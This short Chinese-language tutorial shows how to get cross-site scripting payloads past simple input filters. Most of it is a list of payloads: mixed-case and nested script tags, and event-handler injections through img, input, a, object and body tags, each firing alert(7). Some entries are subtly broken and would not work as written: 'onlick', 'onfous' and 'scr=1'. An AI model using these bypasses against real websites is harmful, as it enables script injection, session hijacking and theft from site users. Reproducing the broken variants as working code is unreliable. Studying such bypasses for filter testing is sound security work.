XSS的簡單過濾和繞過
程序猿用一些函數將構成xss代碼的一些關鍵字符給過濾了。但是,道高一尺魔高一丈,雖然過濾了,還是可以嘗試進行過濾繞過,以達到XSS攻擊的目的。
最簡單的是輸入<script> alert(7)</script> 彈出7
一:區分大小寫過濾標簽
可以使用大小寫繞過 <scripT>alert(7)</scripT>
二:嵌套過濾標簽
可以使用嵌套的script標簽繞過<scr<script>ipt>alert(7)</scr</script>ipt>
三:除了<script>標簽,還可以通過img、body等標簽注入惡意js代碼。
如 <img src=1 onerror=alert(7)>
<img src=1 onlick=alert(7)>
<img src=1 onmouseover=alert(7)> (鼠標移到上面就會觸發)
<input scr=1 onfous="alert(7)">
<a href="javascript:alert(7)">
<object data="javascript:alert(/7/)">
<body onload=alert(7)>